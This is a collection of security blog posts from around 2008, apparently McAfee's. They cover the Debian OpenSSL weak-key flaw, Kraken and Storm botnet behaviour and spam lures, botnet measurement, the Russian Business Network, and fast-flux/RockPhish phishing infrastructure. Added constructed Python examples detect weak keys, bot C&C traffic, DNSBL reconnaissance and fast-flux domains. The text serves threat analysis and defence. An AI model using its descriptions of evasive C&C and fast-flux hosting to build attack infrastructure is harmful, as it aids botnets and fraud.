    The consequence of this bug is that from September 2006 until May 2008 there were only 32,767 possible keys that could be generated by OpenSSL. Several individuals have generated "black lists" of every possible key that this OpenSSL implementation could generate; according to some reports the entire list can be generated in a couple of hours. This weakness affects any key generated by the affected OpenSSL, including SSH and DNSSEC keys among others.

    Many machines will not be updated quickly after the discovery of this vulnerability. There are already many botnets which spread by simply brute forcing common username and password combinations over SSH, and it will probably not be long until some of them are modified to attempt RSA authentication using the faulty OpenSSL keys. These attacks will not take long to develop and have the potential to compromise large numbers of machines. It is important for administrators to note that even if they replace and upgrade the OpenSSL package, they must also recreate and replace any keys or certificates generated by the broken OpenSSL kit.

    The moral for developers is to always be sure you understand the impact of your code changes. This goes extra for critical libraries like OpenSSL. Minor and seemingly inconsequential changes can leave major problems festering undetected for years. There may also be some changes in the way that Debian developers work with the developers of other related software packages like OpenSSL. Hopefully increased communication between the development teams in the future can prevent this kind of bug from recurring.
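
    The "black list" approach described above, as an added example that is not part of the original post: a toy generator whose only entropy is a 16-bit PID, the enumeration of every key it can produce, and the check an administrator would run against a key. The PRNG, key derivation and fingerprint format are constructed stand-ins, not OpenSSL's real algorithms or the real blacklists.

```python
"""Toy model of the Debian OpenSSL PRNG flaw: when the only seed material is
a process ID (positive signed 16-bit, 1..32767), a "random" key is a pure
function of that PID, so the whole key space can be enumerated in advance
and any key found in the list is known to be weak.  Constructed example."""
import hashlib

MAX_PID = 32767  # largest positive signed 16-bit PID, as in the post


def crippled_prng_seed(pid):
    """Stand-in for a PRNG whose only seed material is the process ID."""
    if not 1 <= pid <= MAX_PID:
        raise ValueError("pid outside the 16-bit range")
    return pid.to_bytes(2, "big")


def derive_key(seed):
    """Deterministic stand-in for key generation from PRNG output: the same
    seed always yields the same key, which is all the flaw needs."""
    return hashlib.sha256(b"toy-keygen|" + seed).digest()


def fingerprint(key):
    """Short key identifier, the form in which a blacklist stores keys."""
    return hashlib.sha1(key).hexdigest()[:20]


def build_blacklist():
    """Enumerate every key the crippled generator can produce: fingerprint -> PID.
    With real key types this is a few CPU-hours; here it is instantaneous."""
    return {fingerprint(derive_key(crippled_prng_seed(pid))): pid
            for pid in range(1, MAX_PID + 1)}


def is_weak_key(key, blacklist):
    """Return the seeding PID if the key is one of the enumerable ones, else None."""
    return blacklist.get(fingerprint(key))


def key_space_size(blacklist):
    return len(blacklist)


if __name__ == "__main__":
    bl = build_blacklist()
    print("distinct keys the crippled generator can produce:", key_space_size(bl))
    weak = derive_key(crippled_prng_seed(4242))
    # stand-in for a key made from 32 properly random bytes
    strong = derive_key(bytes(range(32)))
    print("weak key came from PID:", is_weak_key(weak, bl))
    print("properly seeded key in blacklist:", is_weak_key(strong, bl))
```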

    Mailbot.f (a.k.a “Kraken”) gets stealthier - Update

    Over the past week, Mailbot.f (a.k.a “Kraken”) was thoroughly studied and reverse engineered by various security researchers. As mentioned in my previous blog, we focused mainly towards the network behavior of the bot and observed a few interesting things.

    After the bot installs on a victim machine, it attempts to contact mx.google.com via TCP destination port 25 (SMTP) 3 times. This looks to be a network connectivity test by the bot. If this test fails, the bot does not send out any spam at a later stage. (Note that the bot does not use mx.google.com to spam). Next, the bot downloads the front page of 3 different popular web sites (mostly news sites), such as nytimes.com, cbsnews.com, news.com, cnn.com, reuters.com, msn.com, google.com, etc. We have not observed the use of these web pages in the spam sent out by this bot, however.

    kraken-smtp-news-image

    The bot then tries to find its peers and communicates with them. If it is an older version of the bot, it uses UDP destination port 447 to communicate with the peers, sending information such as the bot version, outgoing SMTP connectivity status and other machine-specific information such as hostname, operating system, uptime, language, CPU specs, memory information, etc. It also communicates the current modules and their versions. The older version of the bot then downloads an update from its peers by connecting on TCP destination port 447. We have observed that this update is around 100 to 200 kbytes. The bot then updates itself.

    kraken-old-new-update-image

    The new version of the bot (or updated bot from the previous step) contacts its peers using UDP on random destination ports and sends similar information as in the previous step. It then connects to one of the peers to update its modules using TCP destination port 80. If the peer is available on port 80, the bot communicates using HTTP POST messages and receives the updates from its peers.

    kraken-http-update-image

    In the case when the peer is not available on TCP port 80, the bot communicates on TCP destination port 443 to download the module updates. Though it communicates using TCP port 443, the data is not SSL.

    kraken-https-update-image

    The bot then downloads other modules from its peers, such as spam template, spam payload, and mx server addresses, etc. With this information it starts sending out spam email. After sending out a batch of spam, it downloads further updates and sends out spam again.

    We made the above observations after looking at a number of Mailbot.f samples. Most of these samples were either v315 or v316 (as derived from the bot client registration packet). All of the command & control (C&C) communication is encrypted, and we were able to decode some of it using the Wireshark plugin referenced by the mnin security blog. Since the bot can be updated at will by the bot author, any of these observations may change at any time.

    Given that the bot uses

    • encrypted data
    • random UDP destination ports with random size packet payloads
    • legitimate HTTP protocol on TCP destination port 80
    • communication on TCP destination port 443

    its c&c communication is very stealthy and difficult to detect. Although the bot is currently being used to send spam email, the stealthy c&c communication and the update infrastructure already in-place can pose a greater threat if used for more devastating purposes.

    Mailbot.f (a.k.a “Kraken”) gets stealthier

    After the recent interest in the Kraken bot by various communities, Gaurav Dalal, Denys Ma, and I have been observing the network behavior of the bot very closely. About 2 weeks after the initial analysis from SANS, it seems that the bot author has seeded the bot with an update via TCP port 447. The updated bot now uses a stealthier command and control (C&C) mechanism that will evade previously proposed detections. The updated bot no longer uses UDP port 447 with 74 bytes of payload. After the bot updated itself, we observed that it uses UDP packets with random ports and also random packet payload lengths for its C&C communication. All of this C&C communication is encrypted. Surprisingly, we also noticed that the updated bot now uses the well known HTTP protocol on TCP ports 80 and 443 to send and receive encrypted C&C communication data. More interestingly, the communication on port 443 is encrypted but non-SSL. The process of the upgrade and also the C&C mechanism itself seem to be very interesting. We are continuing our research and will update this blog with more technical information soon.
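
    Detection logic for the traits described in this post and in the update above (the fixed 74-byte UDP/447 beacon of the older bot, the encrypted but non-SSL traffic on TCP 443, and the HTTP POST channel on TCP 80), as an added example that is not part of the original posts or of any McAfee product. The flow records, host addresses and payload bytes are constructed; the TLS header check is a simplification.

```python
"""Per-host scoring of Kraken-style C&C traits over flow summaries.
Constructed example: records are invented, not real captures."""
from collections import defaultdict

# Constructed flow summaries: (src_host, proto, dst_port, payload_len, first_payload_bytes)
FLOWS = [
    ("10.0.0.5", "udp", 447, 74, b"\x4a\x91\x07\x00"),        # old bot: fixed-size beacon
    ("10.0.0.7", "tcp", 443, 517, b"\x16\x03\x01\x02\x00"),   # genuine TLS ClientHello
    ("10.0.0.7", "tcp", 443, 200, b"\x80\x46\x01\x03\x01"),   # SSLv2-framed ClientHello
    ("10.0.0.9", "tcp", 443, 310, b"\x8b\x2f\x00\x11\xde"),   # encrypted, but not SSL/TLS
    ("10.0.0.9", "tcp", 80, 402, b"POST / HTTP/1.1\r\n"),      # HTTP POST update channel
    ("10.0.0.9", "udp", 51834, 133, b"\x00\x3a\xee\x10"),      # random-port UDP peer beacon
]


def looks_like_tls_client_hello(first_bytes):
    """TLS record header: content type 0x16 (handshake), version 3.x.
    Also accept the SSLv2-framed ClientHello (high bit set, message type 1)
    that browsers of the period could still send, to limit false positives."""
    if len(first_bytes) < 3:
        return False
    if first_bytes[0] == 0x16 and first_bytes[1] == 0x03 and first_bytes[2] <= 0x03:
        return True
    return bool(first_bytes[0] & 0x80) and first_bytes[2] == 0x01


def classify_flow(proto, dst_port, payload_len, first_bytes):
    """Indicators matched by one flow.  The random-port, random-length UDP
    beacons of the updated bot deliberately have no per-flow rule here:
    nothing in a single such packet distinguishes it, which is the point
    of the post."""
    hits = []
    if proto == "udp" and dst_port == 447 and payload_len == 74:
        hits.append("udp447_fixed74")          # pre-update beacon
    if proto == "tcp" and dst_port == 443 and not looks_like_tls_client_hello(first_bytes):
        hits.append("non_tls_on_443")          # post-update encrypted non-SSL channel
    if proto == "tcp" and dst_port == 80 and first_bytes.startswith(b"POST "):
        hits.append("http_post_80")            # weak alone: ordinary web traffic does this
    return hits


def score_hosts(flows):
    """Aggregate indicators per source host.  A host is reported when at
    least one strong indicator fires; weak ones are listed for context."""
    per_host = defaultdict(set)
    for src, proto, port, plen, first in flows:
        per_host[src].update(classify_flow(proto, port, plen, first))
    strong = {"udp447_fixed74", "non_tls_on_443"}
    return {host: sorted(inds) for host, inds in per_host.items() if inds & strong}


if __name__ == "__main__":
    for host, indicators in score_hosts(FLOWS).items():
        print(host, indicators)
```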

    Counting the bots

    As I was recently asked about botnet figures, I revisited our collections to establish some trends in this area.

    In 2004 and 2005, bots were placed in a separate group of their own, apart from viruses and Trojans. Their names often ended with "bot" (W32/Sdbot, W32/Spybot, W32/Gaobot…). Based on the number of separate variants we had in our collections (the zoos) at the time, statistics showed a constant increase.

    We have noted since then that a lot of malware has a remote-control feature (i.e. they are bots). Whether we are dealing with worms, viruses or Trojans, they are designed to receive commands and execute them at some point in their life. As of today, much of this remotely-controlled malware is known under various malware family names (W32/Nuwar, W32/Mytob, Spam-Samburg, Srizbi, Backdoor-DIX, etc.). Consequently our counting methods have to change.


    On the Internet, various websites allow us to measure a different aspect of the threat.

    For example, the Shadowserver Web Site shows us a botnet count. The following graph is a count of all the active Command and Control (C&C) servers the Shadowserver Foundation is aware of. There are approximately 2900 botnets today compared to 1400 one year ago:

    Counting the infected computers is a much more arduous task. In January 2007, I reported on Vinton Cerf's talk at the World Economic Forum in Davos, Switzerland, and explained that he estimated 100 or 150 million machines to be infected, representing over 10% of the PCs connected to the Internet. At the same time, some sources estimated fewer than 10 million machines, while others said they identified nearly 250000 new bots, or infected IPs, each day.

    Various techniques can be used to track zombie machines. I will only quote one to allow me the opportunity to give you some interesting links:

    1. Observing DNSBL queries
      The method is described in a white paper from the College of Computing, Georgia Institute of Technology. It is based on the insight that botmasters themselves perform DNS-based blackhole list (DNSBL) lookups to determine whether their spamming bots are blacklisted or not. There are techniques and heuristic rules to distinguish botnet DNSBL reconnaissance queries from valid DNSBL traffic performed by legitimate mail servers.
    2. Watching IRC traffic
      It is one of the simplest methods of detecting IRC-based botnets. It involves sniffing IRC traffic and searching for any signatures matching known botnet commands.
    3. Checking Behavioural Characteristics
      As an example, researcher Stephane Racine demonstrated that IRC bots were idle most of the time on a Chat IRC channel but responded faster than a human upon receiving a command.
    4. Searching for malware hashes on P2P networks
      With decentralized Peer-to-Peer botnets, compromised nodes on the network can be identified by their retrieval of hashes known to be associated with botnets. The College of Computing and Informatics University of North Carolina at Charlotte proposed this method for tracking W32/Nuwar (alias Storm) infected machines. To determine which search hashes are pertinent, the bot could either be actively running on a network without a true Internet connection to determine current hashes, or the hash generation algorithm could be extracted from its binary to generate hash sets on the fly based on the limited set of random integers and the current time.
    5. Watching attack traffic
      Analysing the traffic linked to massive spam distribution or DDoS attacks can reveal the amount of compromised computers. Since January 2008, the Shadowserver graphs demonstrate a huge increase in this field.
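
    One of the heuristics behind method 1 above, as an added example that is not part of the original post or of the Georgia Tech paper: a legitimate mail server looks up DNSBL entries for hosts that are actually delivering mail to it, whereas a botmaster checking whether its bots are blacklisted looks up hosts that never connect to it. The log formats, addresses and thresholds are constructed assumptions, not the paper's parameters.

```python
"""Flag DNSBL reconnaissance by correlating DNSBL lookups with observed
inbound SMTP connections.  Constructed example over invented logs."""
from collections import defaultdict

# Constructed DNSBL query log seen at the resolver: (querier, looked_up_ip)
DNSBL_QUERIES = [
    ("192.0.2.10", "198.51.100.4"), ("192.0.2.10", "198.51.100.9"),
    ("192.0.2.10", "203.0.113.77"),
    ("192.0.2.66", "203.0.113.1"), ("192.0.2.66", "203.0.113.2"),
    ("192.0.2.66", "203.0.113.3"), ("192.0.2.66", "203.0.113.4"),
    ("192.0.2.66", "203.0.113.5"),
]
# Constructed SMTP connection log: (client, server) for connections seen on the wire
SMTP_CONNECTIONS = [
    ("198.51.100.4", "192.0.2.10"), ("198.51.100.9", "192.0.2.10"),
    ("203.0.113.77", "192.0.2.10"),
    ("203.0.113.3", "192.0.2.66"),
]


def build_sender_index(smtp_log):
    """server -> set of clients that delivered mail to it."""
    idx = defaultdict(set)
    for client, server in smtp_log:
        idx[server].add(client)
    return idx


def unexplained_lookups(querier, looked_up, senders):
    """Lookups by 'querier' that no inbound SMTP connection accounts for."""
    known = senders.get(querier, set())
    return sorted(ip for ip in looked_up if ip not in known)


def find_reconnaissance(dnsbl_log, smtp_log, min_lookups=3, threshold=0.8):
    """Return {querier: (unexplained_ratio, suspected_bots)} for queriers
    whose lookups are mostly unexplained by mail they receive.  The
    looked-up addresses are the candidate bots: the botmaster is checking
    their blacklist status.  A mail server that is also a forwarder can be
    a false positive, so the ratio is a lead rather than a verdict."""
    lookups = defaultdict(set)
    for querier, ip in dnsbl_log:
        lookups[querier].add(ip)
    senders = build_sender_index(smtp_log)
    suspects = {}
    for querier, ips in lookups.items():
        if len(ips) < min_lookups:
            continue                      # too little data to judge
        unexplained = unexplained_lookups(querier, ips, senders)
        ratio = len(unexplained) / len(ips)
        if ratio >= threshold:
            suspects[querier] = (ratio, unexplained)
    return suspects


if __name__ == "__main__":
    for querier, (ratio, bots) in find_reconnaissance(DNSBL_QUERIES, SMTP_CONNECTIONS).items():
        print(f"{querier}: {ratio:.0%} of lookups unexplained; suspected bots {bots}")
```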

    To conclude this post, I have to say that looking at these studies did not help me in calculating how many computers are, at the moment, affected by bots! Extrapolating from the 120000 or 150000 items known to be active in a botnet at a given moment to a total number is hard to envisage… However, making these searches was not useless. We can certainly predict that an increase in DDoS attacks will be a 2008 issue and, for sure, that more and more botnets will be used in the field; perhaps 40 or 50% of them.

    Nuwar Isn’t Fooling Around

    In “celebration” of tomorrow being April Fool’s Day, the people behind Nuwar a.k.a. Storm have launched a new E-mail spam campaign. An E-mail with a subject and a short body text like “Happy April Fool’s Day!” or similar would have a usual, for Nuwar anyway, all-numeric-IP http link. Following that link brings up a page like this:

    Nuwar-Fool

    If you wait those 5 seconds, it’ll try to download file funny.exe to your computer. If you click on the image, it’s kickme.exe. And if you click on “click here” it’s foolsday.exe. All of them are nothing but a new Nuwar variant.

    Does virus writing pay the mortgage?

    There was recently an article discussing a talk given by Gene Hodges, on the sociological changes in the virus-writer scene. On the one hand, I think the concept is correct, there has been a very large shift in the sociological motivation behind authoring malware. One of the two conclusions he’s drawn, however, is contrary to facts.

    You may recall from the other day's blog entry that 17 people between the ages of 17 and 26 were arrested in Canada. Earlier that week another person "under the age of 18" was arrested for botnet-related activity. I don't imagine that even teenagers who're making so much money on botnets would be homeowners, as Hodges suggested.

    It seems to me that kids are still what make the malware world go round - many seem to feel invincible, as if the law can't touch them. Or perhaps they just "don't know better". These are kids who've grown up with technology, so cybercrime may seem as easy as taking candy from a baby. And there is still very little risk for them in these crimes. There are few prosecutions compared to the total number of individuals perpetrating these crimes, and these kids have no property or reputation to lose. A married adult with a mortgage, like the ones Hodges describes, might be concerned about losing a house which they and a spouse are living in. A teenager, on the other hand, would be highly unlikely to have property in their name which could be confiscated.

    In short, the stereotype of the kid in his parents' basement still holds. But now maybe they can afford some flashy duds to attract the ladies when they're not holed up in the basement stealing your data.

    Nuwar’s New Wave

    After a series of holiday related campaigns, Nuwar (a.k.a. Storm) is back to its ecard routine. E-mails promising funny ecards are being spammed all over the Internet. The usual http://numeric-IP/ links inside lead to a page like this:

    Nuwar

    A click on the picture leads to postcard.exe download, a click on the “click here” - to e-card.exe download. If nothing is clicked, in five seconds ecard.exe download is started automatically. Needless to say, all of the files are Nuwar.

    Botnet Bust in Canada

    Good news on the botnet-busting front comes to us from Canada! Yesterday 17 people ages 17-26 were arrested on charges stemming from alleged botnet-related activities, which resulted in $45 Million in damages.

    Evidently, this is the first time that a hacking network has been dismantled in Canada (and the first time I recall hearing that a female was busted in connection with botnet activities). Over the course of the two years that this network was under investigation, the network took control of up to a million computers. When you figure the number of computers hijacked, the amount of the damages, and the number of people they were able to connect with this crime, this is a very impressive win for the Quebec police.

    The maximum sentence for the charges is 10 years in jail - it will be interesting to see how much jail time this could mean for the people who're found guilty. When the 15-year-old Canadian who called himself "Mafiaboy" was arrested for DDoS attacks against several major websites in 2000, he was sentenced to only 8 months in jail. He was also found to have caused millions of dollars worth of damage in the attacks. The people charged as part of this hacking network may have begun their criminal activities at the same age as Mafiaboy, as the initial investigation into this network goes back to the summer of 2006. However, it seems that the trend has been towards longer sentences for people convicted of cybercrime, so it may be that they will not get off as lightly as Mafiaboy did.

    The two primary differences that will figure into the sentencing, as I see it, are that the hacking network did this as a money-making enterprise, and that this was done over a long span of time. Arguably, Mafiaboy’s actions could be explained away as a moment of youthful indiscretion. These people allegedly profited from these crimes over the course of two years.

    This makes me wonder how much of the total damage amount they actually took home, versus the cost of cleaning up infected machines, the cost of down-time and lost productivity. I doubt sincerely that these kids’ friends and family wouldn’t have noticed an influx of almost $3 million a piece in such a short span of time.

    All in all, this is an impressive step in the direction of making legal action a real deterrent for kids who would consider taking up cybercrime.

    Valentine Nuwar

    With Valentine’s Day coming this week, we have seen a new wave of Nuwar spamming this Monday evening, amounting to more than 20 variants in a couple of hours. Detection for these variants from major AV vendors was near nonexistent, as the Nuwar writer is using a new compiler this time to bypass detection.

    When you click on the link in the e-mail, the Web site will display a picture and you will be prompted to download the executable as shown below.

    Valentine Day pic

    malware download
    We have seen samples named valentine.exe.
    Happy Valentine’s Day!

    From Nuwar, With Love

    With Christmas and New Year behind us, it's not only shops getting ready for Valentine's Day but Nuwar (a.k.a. Storm) as well. You may receive a Valentine-themed E-mail with a subject like "I Dream of you", "For You….My Love", "Sending You My Love", etc. etc. and body text prompting you to click on a typical Nuwar-style link of the form http://some.numeric.address. If the link is followed, the user is presented with a page similar to this:

    Nuwar 'with love'

    Clicking on the link on that page, or at the image of the heart, will lead to a download of with_love.exe which is, of course, a new variation of Nuwar.

    The Russian Business Network is on tenterhooks

    It’s not a secret anymore; criminal organizations behind a large part of Internet-related frauds are huge and well organized. In the last quarter of 2007, two studies about RBN (Russian Business Network), one of the most well known criminal organizations so far, were published. Last year, I looked at them with great interest. The first is named Uncovering Online Fraud Rings: The Russian Business Network and is available as a webcast recording on the Verisign web site. The second was written by David Bizeul and is named Russian Business Network study.

    These papers demonstrate and illustrate that RBN is an empire. It directly or indirectly manages potentially a million sites. Thanks to elaborate intrusive advertising techniques, millions of Internet users visit its fake retail sites every month. Hackers and other cybercriminals also have their stores and outlets there: malware sales, service offers and booby-trapped sites. Pornography and pedophilia always make money there.

    In addition to these documents, some particularly thorough stories have been circulating on the Net (papers from Brian Krebs at the Washington Post, and posts on the RBNexploit and Dancho Danchev blogs).

    Mailing addresses, names and photos of suspects, detailed lists of machines and autonomous systems, as well as many other details, were revealed. Because of this, the group deemed it best to partially disappear. On November 6th, 2007, many network nodes stopped responding. It was not the end of them, though; the business had been carefully planned: high-activity sites – those leading the attacks at the time – were not disturbed. Gradually, the affected sites began to re-appear in Russia as well as all over the world. Today, many countries in Southeast Asia are mentioned, but they are not alone. The reorganization is under way: new retail payment systems for fake products (mainly fake security products and fake video codecs), new legitimate sites hosting tricky banner ads redirecting computers to these fake retail web sites, new Storm (aka Nuwar) worm campaigns run through new C&C botnet implementations, and new web sites hosting malicious software (like MPack or WebAttacker) that victims reach without noticing, via a hidden iFrame encountered while surfing.

    People tracking down RBN regularly watch its Autonomous Systems (AS). These are collections of connected IP networks controlled by a single entity and defined by an AS number. The RBNexploit blog and the David Bizeul document are very comprehensive on this subject and various network maps or tables help the reader to understand the complexity of such an organization.

    One puzzle piece is known as AS40989. Despite the fact it was not the core center of the RBN activity it is well-known because it seems to be the official name of the group. It is the subject of a new write-up available at the Shadowserver Foundation web site.

    This document analyzes the malicious binary activity directed to and commanded by AS40989. From March to November 2007 the researchers collected 2859 pieces of malware which initiated HTTP connections to it. They found an impressive collection of malware: “Gozi, Goldun, Hupigon, Nurech, Nuklus, Pinch, Sinowal, Tibs, Xorpix, various dialers, downloaders, worms, adware, page hijackers, and proxies”. Once again, it demonstrates the professionalism and the size of the group.

    Reading material on RBN is abundant. With this post, I only wish to draw your attention to this existing material. It demonstrates the vitality of the new criminal organizations; it also demonstrates that many people, at McAfee and elsewhere, stay tuned into the dark side of the Internet to understand how the situation is constantly changing and to fight against this threat at a worldwide level.

    … and a Happy Nuwar!

    Continuing to capitalize on the holiday season theme, Nuwar is up to a new trick.  Or rather a new old e-card trick. You may receive a New Year greeting E-mail like this:


    And if you follow the link (don’t) it currently takes you to a no-frills download-and-infect-your-computer-yourself Web page:

    Needless to say, your New Year isn’t going to be that happy if you follow the instructions.

    Merry Christmas, Nuwar Style

    With Christmas upon us, the bad guys behind Nuwar (a.k.a. Storm Worm) couldn’t miss the opportunity. Here is an example of an e-mail you may receive:


    If you follow the link (please, don’t!), you’ll be greeted like this:


    By this time, of course, an inadequately protected computer would already be infected by Nuwar through a mixture of exploits. And if that doesn't work, the Nuwar authors always leave a chance for a gullible user to click on the image and get infected by the downloaded executable.

    Botnets Jump the Shark

    Once upon a time, a “botnet” was a network of infected computers controlled from a central command and control (C&C) channel. This was a very clear, simple definition.

    Cut to early 2007, after the release of Nuwar, a.k.a. the Storm Worm. Suddenly the term botnet had to account for things that were not controlled by a central C&C but managed by a hydra-headed control network. There was no longer a single head to be cut off to kill a botnet; now a network had several heads, which could be replaced as quickly as one was removed. The definition of botnet broadened to describe only the network of infected computers, exclusive of having a central C&C.

    Now the term has broadened again, to include any functionality used by a botnet, including things such as password stealing and sending phishing emails or spam. The FBI warns that botnets “threaten online-shopper security,” but it seems to me they’re really warning against an increase in the prevalence and sophistication of Internet crime that is facilitated by botnets.

    So I direct this discussion to you, dear reader: Has the definition of botnet become so watered down that it loses any meaning? If so, do we need to find some new term to replace what used to specify a distinct group of malware? Or do we need to broaden our warnings to include all crimeware–including botnets, password stealers, remote-access Trojans, phishing, and spam?

    From Fast-Flux to RockPhish - Part 2

    Last Friday, I started some analysis on fast-flux techniques. I stopped my discussion at single-flux, so today I will improve on the camouflage! To do this, not only the fake site's IP addresses vary but also the IP addresses of the name servers that define them in the DNS architecture. This is double-flux.

    Here, the criminal has a genuine control and monitoring workstation. The zombie machines are no longer used just for relaying HTTP traffic; they also act as the domain name servers and hand out the various IP addresses for the connection, which - as before - are valid only for a moment.

    When the victim tries to reach the site he would like to visit, a request is sent to the name server with authority over the zone. Just as with single-flux, the short lifespan of the address leads the name server request into the criminal network. Used first at this level, the fast-flux technique causes the request to be redirected to a first zombie machine inside the botnet (fast-flux on name servers - IP_A to IP_E). This machine requests the response from the C&C workstation and forwards it to the requestor, using the same method a second time (fast-flux on web site - IP_1 to IP_9).

    In return, the IP address of another zombie machine is sent to the victim. This second bot relays the traffic, preserving the criminal’s anonymity.

    As the blurred image below suggests, this third example deals with an adult site that tries to remain discreet about its origins. Two dig commands launched a few minutes apart show us the result.

    On the web site side, the expiration dates are reduced to 10 minutes (600 seconds), and the site’s IP addresses are very varied (fast-flux on web site). It’s the same for the domain name servers, which changed within a short period of time (fast-flux on name servers).

    Combining the three previous methods gives a major headache :-). But as result, we obtain the scheme used in the mysterious RockPhish structures. The ingredients are:

    • lots of domain names,
    • a fast-flux botnet network in double-flux mode,
    • specialized software that is responsible for sending out phishing e-mails, where each recipient is assigned an index. This is used as a parameter in the URL, and again within the mirror site as long as the victim gets connected.

    I won't bore you with the final network traffic diagram. Simply looking at the following URLs, collected from phishing e-mails, gives you an idea of the complexity of the attack.

    The host domain name varies, as do the domain name servers. The control and monitoring workstation manages the structure of the network in real time. Let’s not forget that this is primarily a network of compromised machines (a botnet). The index is there to ensure proper redirection according to victims, banks, machines to be activated, and the group of fraudsters profiting from the attack.

    I hope this dissection interested you. It demonstrates that attacks are more and more sophisticated. To be sure, groups like the ones using RockPhish with so much energy to improve their network resilience and stealth are doing so because it is very profitable for them.

    From Fast-Flux to RockPhish - Part 1

    For several years, we have been talking about the sophistication of attacks. The main goals are discretion, camouflage and profitability. Some of the common techniques and tools are named Fast-Flux, RockPhish or MPack. As I recently worked on some spam campaigns and dubious websites, I will use them as examples and explain some of these new cybercriminal methods in a set of two blog contributions.

    Before complicating the scheme, let me start with a very simple example:

    Here, a spammer owns a lot of domain names. He constantly buys new ones using stolen credit card numbers and rotates them as they get shut down, which can happen very quickly or slowly depending upon the vigilance and honesty of the access providers.

    One machine contains his site. It may be dedicated to selling medicine or counterfeit luxury products. In order to trick anti-spam software, e-mails are personalized with background noise and random text. For more diversification, and due to the many domain names he has, his software changes the URL of his site for the various messages it sends.

    When a victim tries to follow the link provided for them, a process makes a request to the local name server for the IP address of the machine corresponding to the URL they were sent:

    If the information exists at this level (a cache mechanism), it is forwarded directly to the requester. Otherwise, and if the link is still valid, the desired IP address is returned only after checking root and/or primary servers. Dozens of different domain names could point to a single machine.

    Here is an example of a result that could be obtained using this method:

    With phishing, the methods are becoming more complex. This curve, drawn from APWG statistics, does not highlight the number of victims, which has increased a lot this year.

    It shows that, since mid-2006, the total number of incidents (with and without a victim) has remained stable. What’s interesting are the peaks in November 2006 and particularly in April 2007. The question is: how can we have three times more phishing sites than identified attacks? The answer is called RockPhish.

    To understand it better, we will expand upon the previous example and look at the intermediate single-flux and double-flux methods.

    In single-flux, the criminal has just one domain. Thanks to an unscrupulous access provider, he manages his own domain name server. The criminal also has a network of compromised machines available to him, which he uses as a platform to relay between the victims and his site. The use of very short DNS expiry dates linked to a round-robin technique involving many zombie machine IP addresses allows it to continually change a fictitious physical address used to reach the mirror site.

    The latter is therefore even better protected.

    When the victim tries to reach the mirror site, a request is sent to the name server with authority over the zone.

    The lifespan of the address being no more than a few minutes, there is generally no cached solution. The criminal’s name server is therefore checked. The IP address of one of the bots is sent back to the victim. During the several minutes of the transaction, it will relay the traffic and then disappear, making it more difficult to locate and therefore neutralize key sites.

    Here is an example of an online casino site using single-flux technique:

    My Windows dig (Domain Information Groper) version shows some distinctive network features: the expiration dates here are very short, and the IP addresses are very varied. This is the mark of a camouflage using the single-flux technique.

    The next post will show how double-flux works and, after that, a RockPhish network.
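
    The DNS traits the two fast-flux posts read off the dig output (very short expiry times and widely scattered web site addresses for single-flux, name servers that change as well for double-flux), turned into a scoring routine, as an added example that is not part of the original posts. The dig-style results, addresses and thresholds are constructed assumptions.

```python
"""Classify a host name as normal, single-flux or double-flux from a series
of constructed DNS lookups made a few minutes apart."""
from dataclasses import dataclass


@dataclass
class Answer:
    t: int             # seconds since the first lookup (constructed)
    a_records: tuple   # IPv4 addresses returned for the host name
    ttl: int           # TTL (expiry) of those A records, in seconds
    ns_ips: tuple      # addresses of the zone's name servers at that moment


# Constructed results.  A normal site: long TTL, the same two addresses each time.
LEGIT = [
    Answer(0, ("192.0.2.10", "192.0.2.11"), 3600, ("192.0.2.53",)),
    Answer(600, ("192.0.2.10", "192.0.2.11"), 3600, ("192.0.2.53",)),
]
# The "casino" single-flux case: 5-minute TTL, ever-changing A records, fixed name servers.
CASINO = [
    Answer(0, ("198.51.100.7", "203.0.113.40", "100.64.3.9"), 300, ("192.0.2.53",)),
    Answer(300, ("203.0.113.41", "172.16.8.2", "10.20.30.40"), 300, ("192.0.2.53",)),
    Answer(600, ("100.64.77.1", "198.51.100.200", "10.99.1.1"), 300, ("192.0.2.53",)),
]
# The "adult site" double-flux case: 10-minute TTL, and the name servers rotate too.
ADULT = [
    Answer(0, ("198.51.100.7", "203.0.113.40", "100.64.3.9"), 600, ("10.1.1.1", "172.16.0.5")),
    Answer(600, ("203.0.113.41", "172.16.8.2", "10.20.30.40"), 600, ("100.64.9.9", "10.7.7.7")),
]


def network_prefixes(ips, bits=16):
    """Distinct /bits prefixes.  Zombies sit in many unrelated networks,
    whereas a normal site's addresses cluster in one or two."""
    octets = bits // 8
    return {".".join(ip.split(".")[:octets]) for ip in ips}


def flux_profile(answers):
    all_a = set()
    for ans in answers:
        all_a.update(ans.a_records)
    ns_sets = {frozenset(ans.ns_ips) for ans in answers}
    return {
        "min_ttl": min(ans.ttl for ans in answers),
        "distinct_a": len(all_a),
        "a_prefixes": len(network_prefixes(all_a)),
        "ns_changed": len(ns_sets) > 1,
    }


def classify(answers, ttl_max=600, min_a=5, min_prefixes=3):
    """'single-flux' when the web site addresses flux, 'double-flux' when
    the name servers flux as well, otherwise 'normal'.  Large CDNs also
    use short TTLs and many addresses, so treat a hit as a lead to check,
    not a verdict."""
    p = flux_profile(answers)
    if p["min_ttl"] > ttl_max or p["distinct_a"] < min_a or p["a_prefixes"] < min_prefixes:
        return "normal"
    return "double-flux" if p["ns_changed"] else "single-flux"


if __name__ == "__main__":
    for name, series in (("legit", LEGIT), ("casino", CASINO), ("adult", ADULT)):
        print(name, classify(series), flux_profile(series))
```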

    Avert Labs’ 2008 Threat Predictions

    It seems to be about that time to, once again, get out our computer security crystal ball and conjecture about the upcoming year.

    Many things are changing. Some are staying the same. In some areas we are in uncharted territory.

    Threats are moving quickly to technologies such as VoIP and instant messaging. Virtualization will have a huge impact on both data security and the data security industry itself. Professional and organized criminals continue to drive much of the malicious activity. The complete set of predictions is available for download on McAfee’s Threat Center as well as a bonus episode of our podcast AudioParasitics.

    Passive Host Characterization

    A few security researchers are branching out into a new subject matter that is sometimes called “Passive Host Characterization” (PHC). I had the good fortune to work on one of these projects so I thought I would share a bit of that experience.

PHC is much like a passive IDS – the two are distinct, but a passive IDS is the closest relative to PHC. The basic idea is to deploy sensors around your network to passively monitor traffic. Rather than looking for signatures, you focus on rules that collect data from the observed traffic. For example, you might grab browser User-Agent strings or OpenSSH server banners. It is also common to employ a network-based OS identification tool such as p0f. The concept is very simple: collect OS info, server strings, client strings, DNS info or other simple data, and mine it. From an engineering perspective the situation is harder, since you must back-haul, process and store all that data, but the fundamental task is relatively simple.

There are two such applications that I’m aware of. The first is the TRICKLER project by the NSA. The software is unclassified, open, and available from their technology exchange office. The second is Tenable’s Passive Vulnerability Scanner (PVS). Both have their own pros and cons, but for this post I’m only interested in the technology.

    Now, what can you gain from such technology? From my experience, the answer is as varied as your imagination. Here are some examples:

